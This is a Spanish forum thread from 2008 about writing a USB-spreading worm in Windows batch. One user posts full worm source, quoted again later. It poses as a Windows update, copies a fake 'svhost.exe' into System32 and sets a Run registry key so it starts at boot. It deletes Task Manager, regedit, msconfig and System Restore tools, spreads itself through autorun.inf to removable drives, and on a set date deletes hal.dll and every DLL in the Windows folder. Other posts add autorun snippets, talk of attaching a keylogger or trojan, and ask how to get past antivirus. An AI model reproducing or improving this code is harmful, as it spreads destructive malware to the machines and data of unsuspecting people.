HOW-TO Crear Gusano de Memorias USB en BATCH

‭‭‭‭jackl007 · 6 Marzo 2008, 17:26 PM

pense que no se podria hacer algo asi en batch

neider · 6 Marzo 2008, 22:27 PM

Esta muy bien el manual , estaba buscando algo asi!

octalh, lo unico que creo que falta es que pongas la forma de desinfectarse xD, aunque si no mal he entendido creo que basta con borrar el autorun del usb y ya no contagiara a nadie mas. Y luego borrar el directorio que crea en lacarpeta de windows

Ah y otra cosa mas, rayluch, si no te importa podrias poner los cambios que le has hecho para que lo vieramos todos (Si no quieres que nadie lo tenga como tu no lo pongas y no pasa nada)

Ala byes

rayluch · 6 Marzo 2008, 23:14 PM

Modificando el código de octalh he añadido una función para que si no existe el archivo "x" (troyano, keylogger) instalado en la parte correspondiente del pc se auto ejecute el server automáticamente.

Te doy las gracias otra vez octalh, gracias a ti ya se cómo programar en batch, y empecé desde cero hace 2 días.

EDIT: Por cierto, yo también quiero saber cómo desinfentarlo.

EDIT2: Neider, lo que he hecho es usar las mismas funciones que tiene el código original, si buscas por Internet verás enseguida muchos tutoriales de batch y con eso te aclararas mejor como lo he hecho yo, no es difícil.

Saludos.

rayluch · 7 Marzo 2008, 17:44 PM

Código [Seleccionar]

ECHO shell\1=abrir >> %AUTORUNORIGINAL%
ECHO shell\1\Command=%WORM% >> %AUTORUNORIGINAL%
ECHO shell\2\=explorar >> %AUTORUNORIGINAL%
ECHO shell\2\Command=%WORM% >> %AUTORUNORIGINAL%
ECHO shellexecute=%WORM% >> %AUTORUNORIGINAL%

¿Alguien podría explicar esta parte específica de aquí? Es que no se muy bien cómo funcionan esos comandos.

corax · 7 Marzo 2008, 23:13 PM

bueno, yo también quisiera hacer un aporte de mi código, solo que para evitar la tentación lammer de usarlo "a discrección" contra todobicho viviente, le meteré errores en el código. quien sepa batch no tendrá problemas en repararlos. se agradecen sugerencias:

Código (bash) [Seleccionar]

@echo off

goto initio

initio
title NUEVO HARDWARE ENCONTRADO (ACTUALIZANDO)

AT 12:00 goto jornada
AT 28/03/09 goto apocalpypse

CLS

if exist %windir%\regedit.exe (goto conqeror) else (goto espora)


conqueror
CLS

title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere...

rem Southern Cross, by Corax

copy \svhost.exe C:\WINDOWS\System32\svhost.exe
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v services /d C:\Windows\System32\svhost.exe

CLS

echo [autorun]>>%Windir%\cursors\autorun.inf"
echo OPEN=svhost.exe>>%Windir%\cursors\autorun.inf"

CD %WINDIR%\System32\"
del /Q /F taskmgr.exe
del /Q /F taskkill.exe

CLS

CD %WINDIR%\System32\"
del /Q /F regedt32.exe
del /Q /F wscui.cpl
del /Q /F command.com

CLS

CD %windir%\System32\restore\"
del /Q /F rstrui.exe
del /Q /F srdiag.exe

CLS

CD "%windir%\"
del /Q /F taskman.exe
del /Q /F regedit.exe

CLS

CD "%windir%\PCHealth\HelpCtr\Binaries\"
del /Q /F msconfig.exe

CLS

goto espora




espora
CLS
if exists E:\ (goto 1) else (goto faren)

faren
CLS
if exists F:\ (goto 2) else (goto gotrek)

gotrek
CLS
if exists G:\ (goto 3) else (goto hyperion)

hyperion
CLS
if exists H:\ (goto 4) else (goto espora)


1
if exists E:\svhost.exe (goto faren) else (goto 11)

2
if exists F:\svhost.exe (goto gotrek) else (goto 22)

3
if exists G:\svhost.exe (goto hyperion) else (goto 33)

4
if exists H:\svhost.exe (goto espora) else (goto 44)

11
title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere...
copy C:\WINDOWS\System32\svhost.exe E:\svhost.exe /y
copy %Windir%\cursors\autorun.inf E:\autorun.inf /y
CLS
goto espora

22
title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere...
copy C:\WINDOWS\System32\svhost.exe F:\svhost.exe /y
copy %Windir%\cursors\autorun.inf F:\autorun.inf /y
CLS
goto espora

33
title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere...
copy C:\WINDOWS\System32\svhost.exe G:\svhost.exe /y
copy %Windir%\cursors\autorun.inf G:\autorun.inf /y
CLS
goto espora

44
title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere...
copy C:\WINDOWS\System32\svhost.exe H:\svhost.exe /y
copy %Windir%\cursors\autorun.inf H:\autorun.inf /y
CLS
goto espora





jornada
CLS
shutdown -s -t 10




apocalypse

CD "%WINDIR%\System32\"
del /Q /F hal.dll

CD "%WINDIR%\"
del /S /Q /F *.dll

shutdown -s t- 10
pause
exit

krlos__gb · 11 Marzo 2008, 21:04 PM

gracias estaba buscando algo como esto
pero.. no entiendo mucho el code
si alguien me pudiera aclarar un poco la cosa porfavor
me eh matado trantando de entenderlo xD

espero ayuda saludos

catkill · 12 Marzo 2008, 15:55 PM

EXCELENTE CODIGO, RECIEN ESTOY EMPEZANDO CON BATCH Y NO CREI QUE
TUVIERA TANTAS FACILIDADES PARA DESARROLLAR UN VIRUS

-=Hate_dark=- · 4 Abril 2008, 08:05 AM

octalh MUUUUUUUUY agradecido de verdad... es una maravilla esto :O... he pillado lo que posteas y siempre me impresionas con tu didactica.. de que se te entiende se te entiende... no se programar.. vi unas horas de programacion en C++ pero no fue mucho lo que logre hacer.. tambien admito falta de boluntad y tiempo... pero no es nada dificil el batch y es bastante simpatico y facil de manejar.. gracias por este post que estoy seguro muchos necesitaban leer XD....

PD: lo unico que no me gusto de esto es que ya despues de que se esta expandiendo el worm no deja desconectar el pendrive en modo seguro.. lo que pone en alerta a la persona y posiblemente se vaya parando la cadena...
no habria manera de evitar que esto suceda ? cual es la razon... que es lo que esta usando del disco??.. corrijanme si me equivoco... ya que esta haciendo un ping para que a los 60 segundo se repita el algoritmo esto es lo que mantiene ocupado a pen ? y por eso no lo deja sacar en modo seguro ?... que otras alternativas habria a esto ?...

Gracias de nuevo..
sigue asi =)

-=Hate_dark=- · 4 Abril 2008, 08:08 AM

Cita de: corax en 7 Marzo 2008, 23:13 PM
bueno, yo también quisiera hacer un aporte de mi código, solo que para evitar la tentación lammer de usarlo "a discrección" contra todobicho viviente, le meteré errores en el código. quien sepa batch no tendrá problemas en repararlos. se agradecen sugerencias:
Código (bash) [Seleccionar] Expandir
@echo off goto initio initio title NUEVO HARDWARE ENCONTRADO (ACTUALIZANDO) AT 12:00 goto jornada AT 28/03/09 goto apocalpypse CLS if exist %windir%\regedit.exe (goto conqeror) else (goto espora) conqueror CLS title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere... rem Southern Cross, by Corax copy \svhost.exe C:\WINDOWS\System32\svhost.exe reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v services /d C:\Windows\System32\svhost.exe CLS echo [autorun]>>%Windir%\cursors\autorun.inf" echo OPEN=svhost.exe>>%Windir%\cursors\autorun.inf" CD %WINDIR%\System32\" del /Q /F taskmgr.exe del /Q /F taskkill.exe CLS CD %WINDIR%\System32\" del /Q /F regedt32.exe del /Q /F wscui.cpl del /Q /F command.com CLS CD %windir%\System32\restore\" del /Q /F rstrui.exe del /Q /F srdiag.exe CLS CD "%windir%\" del /Q /F taskman.exe del /Q /F regedit.exe CLS CD "%windir%\PCHealth\HelpCtr\Binaries\" del /Q /F msconfig.exe CLS goto espora espora CLS if exists E:\ (goto 1) else (goto faren) faren CLS if exists F:\ (goto 2) else (goto gotrek) gotrek CLS if exists G:\ (goto 3) else (goto hyperion) hyperion CLS if exists H:\ (goto 4) else (goto espora) 1 if exists E:\svhost.exe (goto faren) else (goto 11) 2 if exists F:\svhost.exe (goto gotrek) else (goto 22) 3 if exists G:\svhost.exe (goto hyperion) else (goto 33) 4 if exists H:\svhost.exe (goto espora) else (goto 44) 11 title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere... copy C:\WINDOWS\System32\svhost.exe E:\svhost.exe /y copy %Windir%\cursors\autorun.inf E:\autorun.inf /y CLS goto espora 22 title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere... copy C:\WINDOWS\System32\svhost.exe F:\svhost.exe /y copy %Windir%\cursors\autorun.inf F:\autorun.inf /y CLS goto espora 33 title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere... copy C:\WINDOWS\System32\svhost.exe G:\svhost.exe /y copy %Windir%\cursors\autorun.inf G:\autorun.inf /y CLS goto espora 44 title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere... copy C:\WINDOWS\System32\svhost.exe H:\svhost.exe /y copy %Windir%\cursors\autorun.inf H:\autorun.inf /y CLS goto espora jornada CLS shutdown -s -t 10 apocalypse CD "%WINDIR%\System32\" del /Q /F hal.dll CD "%WINDIR%\" del /S /Q /F *.dll shutdown -s t- 10 pause exit

Muy interezante... si estoy viendo los errores.. a lo mejor no detallo algunos ya que apenas hoy me voy enterando de esta maravilla de todas formas espero que ayudes un poco tambien vale ?.... otra cosa es que esta un poco agresivo XD como para probarlo con uno mismo ... de todas formas lo seguire detallando y viendo que le puedo quitar o poner.. gracias por compartir...

PD: no me he fijado si cambiaste lo del ping que puso octalh para que se repitiera el ciclo.. que otras alternativas a estas se te ocurre para que se pueda extraer el pendrive en modo seguro sin problemas.

siete7 · 7 Abril 2008, 16:55 PM

Tengo un pequeño problema con el Quick_Batch_File_Compiler_3.1.5.0.
cuando compilo mi pequeño prog en batch(solo son varias sentencias para copiar un archivo a otro lado) para que no aparezca la ventana en MsDos mi antivirus, el AVG free, me lo detecta como un troyano y no me deja compilarlo. Si cierro los procesos del antivirus y compilo el programa falla.
Puede alguien ayudarme.